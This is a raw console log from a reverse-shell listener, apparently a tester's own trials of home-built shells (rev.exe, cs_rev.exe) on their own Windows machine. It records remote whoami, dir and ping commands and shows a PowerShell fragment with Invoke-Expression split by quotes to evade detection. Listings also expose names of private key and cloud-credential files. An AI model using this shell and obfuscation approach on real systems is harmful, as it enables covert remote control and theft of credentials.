[connection received ('73.89.81.202', 57236)]
[connection received ('73.89.81.202', 46460)]
> id
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),100(users),106(netdev),117(wireshark),120(bluetooth),125(lpadmin),131(inetsim),137(kaboxer),998(systemd-network),1002(networkmanager)
[connection received ('73.89.81.202', 59539)]
> whoami
Microsoft Windows [Version 10.0.22631.2428]
(c) Microsoft Corporation. All rights reserved.

C:\Users\hollo\OneDrive\Desktop\rev>[connection received ('73.89.81.202', 59553)]
[connection received ('73.89.81.202', 60824)]
> whoami
Microsoft Windows [Version 10.0.22631.2428]
(c) Microsoft Corporation. All rights reserved.

C:\Users\hollo\OneDrive\Desktop\rev>> dir
whoami
mydevice\hollo

C:\Users\hollo\OneDrive\Desktop\rev>[connection received ('73.89.81.202', 60842)]
[connection received ('73.89.81.202', 60850)]
> dir
Microsoft Windows [Version 10.0.22631.2428]
(c) Microsoft Corporation. All rights reserved.

C:\Users\hollo\OneDrive\Desktop\rev>> dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 6A8E-548C

 Directory of C:\Users\hollo\OneDrive\Desktop\rev

11/17/2023  09:47 PM    <DIR>          .
11/17/2023  09:06 PM    <DIR>          ..
11/17/2023  09:55 PM             1,679 rev.c
11/17/2023  09:55 PM            87,040 rev.exe
11/17/2023  09:55 PM             2,298 rev.obj
               3 File(s)         91,017 bytes
               2 Dir(s)  936,184,299,520 bytes free

C:\Users\hollo\OneDrive\Desktop\rev>[connection received ('73.89.81.202', 60857)]
> 
Microsoft Windows [Version 10.0.22631.2428]
(c) Microsoft Corporation. All rights reserved.

C:\Users\hollo\OneDrive\Desktop>> dir

C:\Users\hollo\OneDrive\Desktop>> dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 6A8E-548C

 Directory of C:\Users\hollo\OneDrive\Desktop

11/17/2023  09:06 PM    <DIR>          .
04/23/2023  09:55 AM    <DIR>          ..
11/03/2023  06:31 PM            26,624 basic.doc
08/09/2023  06:17 PM               133 bored.py
11/17/2023  09:04 PM            87,040 crypto_key_store.exe
05/29/2023  10:13 PM               780 cvfun.py
02/10/2023  01:16 PM            48,587 d2ohut-591549aa-f26f-4cfb-a33a-f1b5c72d3a3f.png
11/16/2023  06:13 PM             2,237 Discord.lnk
08/07/2023  10:16 PM             1,010 elfMage.txt
07/10/2023  06:26 PM    <DIR>          fun_node
07/03/2023  08:52 PM    <DIR>          fun_python
10/28/2023  02:12 PM            61,440 hack_stbi3.ctb
10/28/2023  02:12 PM            61,440 hack_stbi3.ctb~
10/28/2023  02:11 PM            61,440 hack_stbi3.ctb~~
10/28/2023  12:47 PM            61,440 hack_stbi3.ctb~~~
04/28/2023  05:28 PM    <DIR>          htb
01/15/2023  01:47 PM             2,496 id.r> dir
sa
01/14/2023  10:58 PM               300 k.txt
03/06/2023  04:47 PM            68,132 me.jpg
05/31/2023  08:26 PM                21 myBox.bat
11/05/2023  01:18 PM             2,626 myBox.key.txt
10/21/2023  12:21 PM             2,454 myBox.rdp
11/11/2023  09:15 PM         9,743,478 myKB_webPage.mht
02/10/2023  10:44 PM    <DIR>          offsec
05/29/2023  04:11 PM               991 oneDrive Projects.lnk
05/30/2023  06:59 AM            27,519 oot2.mht
05/30/2023  07:00 AM           853,061 oot3.mht
10/11/2023  09:42 PM    <DIR>          oscp
02/28/2023  05:24 PM         5,420,008 OSCP-Exam-Report.docx
02/28/2023  05:32 PM         1,614,021 OSCP-OS-565761-Exam-Report.7z
02/28/2023  05:29 PM         1,688,763 OSCP-OS-565761-Exam-Report.pdf
03/03/2023  07:51 PM    <DIR>          oscp_cert
06/22/2023  09:40 PM             2,195 Postman.lnk
11/25/2022  03:59 PM             1,037 project.lnk
05/30/2023  06:58 AM            27,522 psOOT.mht
11/17/2023  09:47 PM    <DIR>          rev
03/03/2023  0> whoami
8:57 AM           178,351 RMV_letter.pdf
02/04/2023  11:38 AM             1,392 Spotify.lnk
05/23/2023  07:39 PM                22 user@arch[vm].bat
11/26/2022  12:53 AM             1,410 Visual Studio Code.lnk
11/03/2023  11:05 PM             1,110 WinDirStat.lnk
              32 File(s)     20,049,080 bytes
               9 Dir(s)  936,183,836,672 bytes free

C:\Users\hollo\OneDrive\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 6A8E-548C

 Directory of C:\Users\hollo\OneDrive\Desktop

11/17/2023  09:06 PM    <DIR>          .
04/23/2023  09:55 AM    <DIR>          ..
11/03/2023  06:31 PM            26,624 basic.doc
08/09/2023  06:17 PM               133 bored.py
11/17/2023  09:04 PM            87,040 crypto_key_store.exe
05/29/2023  10:13 PM               780 cvfun.py
02/10/2023  01:16 PM            48,587 d2ohut-591549aa-f26f-4cfb-a33a-f1b5c72d3a3f.png
11/16/2023  06:13 PM             2,237 Discord.lnk
08/07/2023  10:16 PM             1,010 elfMage.txt
07/10/202> whoami
3  06:26 PM    <DIR>          fun_node
07/03/2023  08:52 PM    <DIR>          fun_python
10/28/2023  02:12 PM            61,440 hack_stbi3.ctb
10/28/2023  02:12 PM            61,440 hack_stbi3.ctb~
10/28/2023  02:11 PM            61,440 hack_stbi3.ctb~~
10/28/2023  12:47 PM            61,440 hack_stbi3.ctb~~~
04/28/2023  05:28 PM    <DIR>          htb
01/15/2023  01:47 PM             2,496 id.rsa
01/14/2023  10:58 PM               300 k.txt
03/06/2023  04:47 PM            68,132 me.jpg
05/31/2023  08:26 PM                21 myBox.bat
11/05/2023  01:18 PM             2,626 myBox.key.txt
10/21/2023  12:21 PM             2,454 myBox.rdp
11/11/2023  09:15 PM         9,743,478 myKB_webPage.mht
02/10/2023  10:44 PM    <DIR>          offsec
05/29/2023  04:11 PM               991 oneDrive Projects.lnk
05/30/2023  06:59 AM            27,519 oot2.mht
05/30/2023  07:00 AM           853,061 oot3.mht
10/11/2023  09:42 PM    <DIR>          oscp
02/28/2023  05:24 PM         5,420,008 OSCP-Exam-Report.docx> meow

02/28/2023  05:32 PM         1,614,021 OSCP-OS-565761-Exam-Report.7z
02/28/2023  05:29 PM         1,688,763 OSCP-OS-565761-Exam-Report.pdf
03/03/2023  07:51 PM    <DIR>          oscp_cert
06/22/2023  09:40 PM             2,195 Postman.lnk
11/25/2022  03:59 PM             1,037 project.lnk
05/30/2023  06:58 AM            27,522 psOOT.mht
11/17/2023  09:47 PM    <DIR>          rev
03/03/2023  08:57 AM           178,351 RMV_letter.pdf
02/04/2023  11:38 AM             1,392 Spotify.lnk
05/23/2023  07:39 PM                22 user@arch[vm].bat
11/26/2022  12:53 AM             1,410 Visual Studio Code.lnk
11/03/2023  11:05 PM             1,110 WinDirStat.lnk
              32 File(s)     20,049,080 bytes
               9 Dir(s)  936,183,836,672 bytes free

C:\Users\hollo\OneDrive\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 6A8E-548C

 Directory of C:\Users\hollo\OneDrive\Desktop

11/17/2023  09:06 PM    <DIR>          .
04/23/2023  09:55 AM    <DIR>          ..
11/03/[connection received ('73.89.81.202', 60949)]
[connection received ('73.89.81.202', 60952)]
> whoami
Microsoft Windows [Version 10.0.22631.2428]
(c) Microsoft Corporation. All rights reserved.

C:\Users\hollo\OneDrive\Desktop\rev>> whoami
whoami
mydevice\hollo

C:\Users\hollo\OneDrive\Desktop\rev>> dir
whoami
mydevice\hollo

C:\Users\hollo\OneDrive\Desktop\rev>> dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 6A8E-548C

 Directory of C:\Users\hollo\OneDrive\Desktop\rev

11/17/2023  10:11 PM    <DIR>          .
11/17/2023  09:06 PM    <DIR>          ..
11/17/2023  10:11 PM             1,212 rev.c
11/17/2023  10:11 PM            87,040 rev.exe
11/17/2023  10:11 PM             2,298 rev.obj
               3 File(s)         90,550 bytes
               2 Dir(s)  936,181,805,056 bytes free

C:\Users\hollo\OneDrive\Desktop\rev>> whoami
dir
 Volume in drive C has no label.
 Volume Serial Number is 6A8E-548C

 Directory of C:\Users\hollo\OneDrive\Desktop\rev

11/17/2023  10:11 PM    <DIR>          .
11/17/2023  09:06 PM    <DIR>          ..
11/17/2023  10:11 PM             1,212 rev.c
11/17/2023  10:11 PM            87,040 rev.exe
11/17/2023  10:11 PM             2,298 rev.obj
               3 File(s)         90,550 bytes
               2 Dir(s)  936,181,805,056 bytes free

C:\Users\hollo\OneDrive\Desktop\rev>> whoami
whoami
mydevice\hollo

C:\Users\hollo\OneDrive\Desktop\rev>> echo hi
whoami
mydevice\hollo

C:\Users\hollo\OneDrive\Desktop\rev>> echo hi
echo hi
hi

C:\Users\hollo\OneDrive\Desktop\rev>[connection received ('73.89.81.202', 60998)]
[connection received ('73.89.81.202', 61058)]
[connection received ('73.89.81.202', 61171)]
> whoami
Microsoft Windows [Version 10.0.22631.2428]
(c) Microsoft Corporation. All rights reserved.

C:\Users\hollo\OneDrive\Desktop\rev>> whoami
whoami

C:\Users\hollo\OneDrive\Desktop\rev>> whoami
whoami

C:\Users\hollo\OneDrive\Desktop\rev>[connection received ('73.89.81.202', 61188)]
[connection received ('73.89.81.202', 61445)]
[connection received ('73.89.81.202', 61451)]
[connection received ('73.89.81.202', 61463)]
> whoami
Microsoft Windows [Version 10.0.22631.2428]
(c) Microsoft Corporation. All rights reserved.

C:\Users\hollo\OneDrive\Desktop\rev>> whoami
whoami
mydevice\hollo

C:\Users\hollo\OneDrive\Desktop\rev>> whoami
whoami
mydevice\hollo

C:\Users\hollo\OneDrive\Desktop\rev>> dir
whoami
mydevice\hollo

C:\Users\hollo\OneDrive\Desktop\rev>> dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 6A8E-548C

 Directory of C:\Users\hollo\OneDrive\Desktop\rev

11/17/2023  10:11 PM    <DIR>          .
11/17/2023  09:06 PM    <DIR>          ..
11/17/2023  11:15 PM             1,606 rev.c
11/17/2023  11:15 PM           121,344 rev.exe
11/17/2023  11:15 PM             3,818 rev.obj
               3 File(s)        126,768 bytes
               2 Dir(s)  935,919,566,848 bytes free

C:\Users\hollo\OneDrive\Desktop\rev>[connection received ('73.89.81.202', 61470)]
> whoami
Microsoft Windows [Version 10.0.22631.2428]
(c) Microsoft Corporation. All rights reserved.

C:\Users\hollo\OneDrive\Desktop\rev>> 
whoami
mydevice\hollo

C:\Users\hollo\OneDrive\Desktop\rev>> 

C:\Users\hollo\OneDrive\Desktop\rev>[connection received ('73.89.81.202', 61689)]
[connection received ('73.89.81.202', 61695)]
[connection received ('73.89.81.202', 61697)]
> whoami
Microsoft Windows [Version 10.0.22631.2428]
(c) Microsoft Corporation. All rights reserved.

C:\Users\hollo\OneDrive\Desktop\rev>> whoami
whoami
mydevice\hollo

C:\Users\hollo\OneDrive\Desktop\rev>> whoami
Microsoft Windows [Version 10.0.22631.2428]
(c) Microsoft Corporation. All rights reserved.

C:\Users\hollo\OneDrive\Desktop\rev>> whoami
Microsoft Windows [Version 10.0.22631.2428]
(c) Microsoft Corporation. All rights reserved.

C:\Users\hollo\OneDrive\Desktop\rev>[connection received ('73.89.81.202', 61705)]
[connection received ('73.89.81.202', 50373)]
> whoami
mydevice\hollo
> dir
.aws .azure .cache_remix_ide .dbus-keyrings .docker .dotnet .ssh .templateengine .VirtualBox .vscode ansel Contacts Documents Downloads Favorites Links Music OneDrive Orbx Library Postman project Saved Games Searches source speedrunigt Videos VirtualBox VMs .node_repl_history hi.txt hi2.txt username=aasdasdasaasdasdassdasdasaasdasdasaasdasdassdasdassdasdasaasdasdasaasdasdassdasdassdasdassdasdas&password=asdasd
[connection received ('73.89.81.202', 50556)]
> id
SHELL> > id
Invoke-Expression : The term 'id' is not recognized as the name of a cmdlet, function, script file, or operable 
program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:521
+ ... sRead - 1);$Output = try {Inv''oke-Expre''ssion $Command 2>&1 | Ou''t ...
+                               ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (id:String) [Invoke-Expression], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException,Microsoft.PowerShell.Commands.InvokeExpressionCommand
 
SHELL> > whoami
Invoke-Expression : The term 'id' is not recognized as the name of a cmdlet, function, script file, or operable 
program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:521
+ ... sRead - 1);$Output = try {Inv''oke-Expre''ssion $Command 2>&1 | Ou''t ...
+                               ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (id:String) [Invoke-Expression], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException,Microsoft.PowerShell.Commands.InvokeExpressionCommand
 
SHELL> > whoami
mydevice\hollo
SHELL> [connection received ('73.89.81.202', 50636)]
> whoami
SHELL> > whoami
mydevice\hollo
SHELL> > dir
mydevice\hollo
SHELL> > dir


    Directory: C:\Users\hollo


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
d-----        11/12/2023   6:37 PM                .aws                                                                 
d-----        11/12/2023   6:37 PM                .azure                                                               
d-----        11/11/2023   8:55 PM                .cache_remix_ide                                                     
d-----         11/4/2023   2:36 PM                .dbus-keyrings                                                       
d-----        11/12/2023   6:40 PM                .docker                                                              
d-----        11/11/2023   8:21 PM                .dotnet                                                              
d-----         9/[connection received ('73.89.81.202', 50721)]
[connection received ('73.89.81.202', 50725)]
> whoami
SHELL> > whoami
mydevice\hollo
SHELL> [connection received ('73.89.81.202', 50784)]
[stage2 connection received ('73.89.81.202', 52161)]
> whoami
SHELL> > whoami
mydevice\hollo
SHELL> > dir
mydevice\hollo
SHELL> > dir


    Directory: C:\Users\hollo\OneDrive\Desktop\rev


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----        11/18/2023   1:38 PM      146694790 cs_rev.exe                                                           
-a----        11/18/2023  12:00 PM             44 rev.c                                                                
-a----        11/18/2023  11:14 AM           1814 rev.cs                                                               
-a----        11/17/2023  11:15 PM           3818 rev.obj                                                              


SHELL> > whoami


    Directory: C:\Users\hollo\OneDrive\Desktop\rev


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----        11/18/2023   1:38 PM      146694790 cs_rev.exe                                                           
-a----        11/18/2023  12:00 PM             44 rev.c                                                                
-a----        11/18/2023  11:14 AM           1814 rev.cs                                                               
-a----        11/17/2023  11:15 PM           3818 rev.obj                                                              


SHELL> > whoami
mydevice\hollo
SHELL> [stage2 connection received ('73.89.81.202', 52209)]
> whoami
SHELL> > whoami
mydevice\hollo
SHELL> > cwd
mydevice\hollo
SHELL> [stage2 connection received ('73.89.81.202', 52221)]
> whoami
mydevice\hollo
SHELL> [stage2 connection received ('73.89.81.202', 52239)]
> cwd
Invoke-Expression : The term 'cwd' is not recognized as the name of a cmdlet, function, script file, or operable 
program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:521
+ ... sRead - 1);$Output = try {Inv''oke-Expre''ssion $Command 2>&1 | Ou''t ...
+                               ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (cwd:String) [Invoke-Expression], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException,Microsoft.PowerShell.Commands.InvokeExpressionCommand
 
SHELL> > whoami
mydevice\hollo
SHELL> > dir


    Directory: C:\Users\hollo\OneDrive\Desktop\rev


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----        11/18/2023   1:38 PM      146694790 cs_rev.exe                                                           
-a----        11/18/2023  12:00 PM             44 rev.c                                                                
-a----        11/18/2023  11:14 AM           1814 rev.cs                                                               
-a----        11/17/2023  11:15 PM           3818 rev.obj                                                              


SHELL> > ping google.com

Pinging google.com [142.250.72.110] with 32 bytes of data:
Reply from 142.250.72.110: bytes=32 time=29ms TTL=55
Reply from 142.250.72.110: bytes=32 time=24ms TTL=55
Reply from 142.250.72.110: bytes=32 time=25ms TTL=55
Reply from 142.250.72.110: bytes=32 time=31ms TTL=55

Ping statistics for 142.250.72.110:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 24ms, Maximum = 31ms, Average = 27ms
SHELL> [stage2 connection received ('73.89.81.202', 52273)]
[stage2 connection received ('73.89.81.202', 52285)]
[stage2 connection received ('73.89.81.202', 52302)]
[stage2 connection received ('73.89.81.202', 52339)]
[stage2 connection received ('73.89.81.202', 52351)]
> whoami
mydevice\hollo
> dir


    Directory: C:\Users\hollo\OneDrive\Desktop\rev


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----        11/18/2023   1:38 PM      146694790 cs_rev.exe                                                           
-a----        11/18/2023  12:00 PM             44 rev.c                                                                
-a----        11/18/2023  11:14 AM           1814 rev.cs                                                               
-a----        11/17/2023  11:15 PM           3818 rev.obj                                                              


[stage2 connection received ('73.89.81.202', 52360)]
> whoami
mydevice\hollo
> dir


    Directory: C:\Users\hollo\OneDrive\Desktop\rev


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----        11/18/2023   1:38 PM      146694790 cs_rev.exe                                                           
-a----        11/18/2023  12:00 PM             44 rev.c                                                                
-a----        11/18/2023  11:14 AM           1814 rev.cs                                                               
-a----        11/17/2023  11:15 PM           3818 rev.obj                                                              


> ping wickedpython.com

Pinging wickedpython.com [3.81.0.34] with 32 bytes of data:
Request timed out.
Request timed out.
Request timed out.
Request timed out.

Ping statistics for 3.81.0.34:
    Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),
> whoami
mydevice\hollo
[stage2 connection received ('73.89.81.202', 52414)]
> whoami
mydevice\hollo
> 
Invoke-Expression : Cannot bind argument to parameter 'Command' because it is an empty string.
At line:1 char:531
+ ... $BytesRead - 1);$Output = try {Inv''oke-Expre''ssion $Command 2>&1 |  ...
+                                                          ~~~~~~~~
    + CategoryInfo          : InvalidData: (:) [Invoke-Expression], ParameterBindingValidationException
    + FullyQualifiedErrorId : ParameterArgumentValidationErrorEmptyStringNotAllowed,Microsoft.PowerShell.Commands.Invo 
   keExpressionCommand
 
> 
Invoke-Expression : Cannot bind argument to parameter 'Command' because it is an empty string.
At line:1 char:531
+ ... $BytesRead - 1);$Output = try {Inv''oke-Expre''ssion $Command 2>&1 |  ...
+                                                          ~~~~~~~~
    + CategoryInfo          : InvalidData: (:) [Invoke-Expression], ParameterBindingValidationException
    + FullyQualifiedErrorId : ParameterArgumentValidationErrorEmptyStringNotAllowed,Microsoft.PowerShell.Commands.Invo 
   keExpressionCommand
 
[stage2 connection received ('73.89.81.202', 52457)]
> whoami
mydevice\hollo
